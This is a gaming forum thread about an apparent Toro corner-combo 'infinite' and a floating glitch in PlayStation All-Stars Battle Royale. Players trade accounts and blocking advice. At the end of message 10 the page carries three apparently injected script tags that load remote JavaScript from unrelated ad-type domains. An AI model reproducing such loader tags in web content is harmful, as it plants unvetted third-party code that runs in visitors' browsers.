Showing results for 
Search instead for 
Do you mean 
Jan 09 2013
By: DrDude101 Wastelander 721 posts

Toro corner infinite?

31 replies 583 views Edited Jan 9, 2013
I was playing as big daddy and toro caught me in a corner and did two moves over and over that I couldn't escape nor block once hit. Couldn't even super armor hit him. He went from lvl 1 to 3 in that corner....
Message 1 of 32 (583 Views)
0 Likes
Fender Bender
4119 posts

Re: Toro corner infinite?

Jan 9, 2013

DrDude101 wrote:
I was playing as big daddy and toro caught me in a corner and did two moves over and over that I couldn't escape nor block once hit. Couldn't even super armor hit him. He went from lvl 1 to 3 in that corner....

was his name assasain-PR?

Message 2 of 32 (555 Views)
0 Likes
Uncharted Territory
1735 posts

Jan 9, 2013

khknight wrote:

DrDude101 wrote:

I fought that guy, and I know EXACLY the move you're talking about. It's like a short jump + diagonal kick over and over again, right?

Message 3 of 32 (526 Views)
0 Likes
Fender Bender
4119 posts

[ Edited ]
Jan 9, 2013

ORGAN1ZAT10N_13 wrote:

khknight wrote:

DrDude101 wrote:

I fought that guy, and I know EXACLY the move you're talking about. It's like a short jump + diagonal kick over and over again, right?

yup, then he hit confirms into level 1. 

He justs gets his level 1 with that loop  combo before the ap burst kicks in, its so broken.

Sh*t like this only reifirms my reasoning for removing kill confirms completely. 

Message 4 of 32 (504 Views)
0 Likes
Wastelander
615 posts

Jan 9, 2013
It isn't an infinite. Just hold block and punish. All he can get from it is a confirm for his level 1 or an ap burst.
Message 5 of 32 (491 Views)
Wastelander
721 posts

Jan 9, 2013
@org and knight
Yeah kick short jump and repeat.

@shadow
He hit me once in a corner while I was rolling, and went from lvl 1 to 3 after that one hit by spamming one tiny combo. I was blocking the entire match and he caught me that once. So no blocking doesn't help.
Message 6 of 32 (479 Views)
Lombax Warrior
76 posts

Jan 9, 2013

There are no combos in the game that take you from 1-3.  You failed to block, the AP burst happens once a combo earns 100 AP.

There is one exception to this rule, and it is dependant on who YOU are playing as to whether or not you can be put in a true infinite, not dependant on the person executing the combo's character.

Namely if you use Sly it is possible to be put in a true infinite - but only then.  And frankly if you use Sly?  Deal with it, you're OP already.

Come watch competitive and casual PSASBR play:
http://twitch.tv/hotboxgaming
Message 7 of 32 (469 Views)
Wastelander
721 posts

Jan 9, 2013
Godless, I couldn't block after he started. I tried. I tried armor hitting him, but alas I couldn't. You infer I don't know how to block yet I do and it didn't do anything as he started with the jump kick, which I rolled to escape from yet was still hit into the corner and he started to perfectly time this 2 hit combo that ended with a crumple. So it was rinse and repeat. This combo is not an infinite in any other case. But in a corner it turns into a infinite some how.
Message 8 of 32 (463 Views)
0 Likes
Uncharted Territory
1087 posts

[ Edited ]
Jan 10, 2013

Not to call anyone out, but I JUST fought that guy and I came to this topic to talk about that very move, and it turns out you guys are dealing with the same thing.

It was a FFA Stock match and he basically used the corner infinite to kill everyone.  He took all of my lives first and I couldn't get out of the combo-- rolling didn't work at all, but I'll have to try holding block next time.

On another note, there's another glitch he abused that involves floating infinitely in the air using Up+Triangle (Oni) and then Neutral Circle.  When it was down to him and a Nariko player, the Nariko managed to pull off a Level 3, but he did the floating glitch and essentially made her entire Level 3 miss.

This stuff needs to be fixed ASAP. :/

Message 9 of 32 (414 Views)
Gaming Beast
2167 posts

Jan 10, 2013
Oh yeah Toro's floating glitch is pretty dumb :smileysad:

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 10 of 32 (399 Views)
0 Likes